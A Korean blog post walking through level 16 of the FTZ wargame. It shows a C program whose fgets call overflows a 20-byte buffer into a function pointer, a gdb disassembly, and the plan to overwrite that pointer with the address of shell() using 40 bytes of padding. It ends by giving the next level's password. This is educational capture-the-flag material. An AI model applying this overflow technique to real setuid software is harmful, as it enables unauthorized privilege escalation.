티스토리 뷰

System/FTZ

[FTZ] level16

MitNy 2017. 9. 28. 18:45



16번은 attackme.c 파일도 존재한다.


힌트는 다음과 같다.


#include <stdio.h>


void shell() {

  setreuid(3097,3097);

  system("/bin/sh");

}


void printit() {

  printf("Hello there!\n");

}


main()

{ int crap;

  void (*call)()=printit;

  char buf[20];

  fgets(buf,48,stdin);

  call();

}



코드만 볼땐 shell() 함수가 실행돼야 하는데, shell() 함수가 사용된 곳은 없고

왠지 *call 부분을 수정해 shell 함수의 주소를 실행하도록 하면 될 것 같다.



gdb로도 보자.

Dump of assembler code for function main:

0x08048518 <main+0>: push   ebp

0x08048519 <main+1>: mov    ebp,esp

0x0804851b <main+3>: sub    esp,0x38

0x0804851e <main+6>: mov    DWORD PTR [ebp-16],0x8048500

0x08048525 <main+13>: sub    esp,0x4

0x08048528 <main+16>: push   ds:0x80496e8

0x0804852e <main+22>: push   0x30

0x08048530 <main+24>: lea    eax,[ebp-56]

0x08048533 <main+27>: push   eax

0x08048534 <main+28>: call   0x8048384 <fgets>

0x08048539 <main+33>: add    esp,0x10

0x0804853c <main+36>: mov    eax,DWORD PTR [ebp-16]

0x0804853f <main+39>: call   eax

0x08048541 <main+41>: leave

0x08048542 <main+42>: ret

0x08048543 <main+43>: nop

0x08048544 <main+44>: nop

0x08048545 <main+45>: nop

0x08048546 <main+46>: nop

0x08048547 <main+47>: nop

0x08048548 <main+48>: nop

0x08048549 <main+49>: nop

0x0804854a <main+50>: nop

0x0804854b <main+51>: nop

0x0804854c <main+52>: nop

0x0804854d <main+53>: nop

0x0804854e <main+54>: nop

0x0804854f <main+55>: nop

End of assembler dump.




 0x80484d0


이 주소와 아까 A 40개를 이용해 풀어보도록 하자.




Level17 Password is "king poetic".


'System > FTZ' 카테고리의 다른 글

[FTZ] level18  (0) 2017.09.28
[FTZ] level17  (0) 2017.09.28
[FTZ] level15  (0) 2017.09.27
[FTZ] level14  (0) 2017.09.25
[FTZ] level13  (3) 2017.09.21
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG more
«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
글 보관함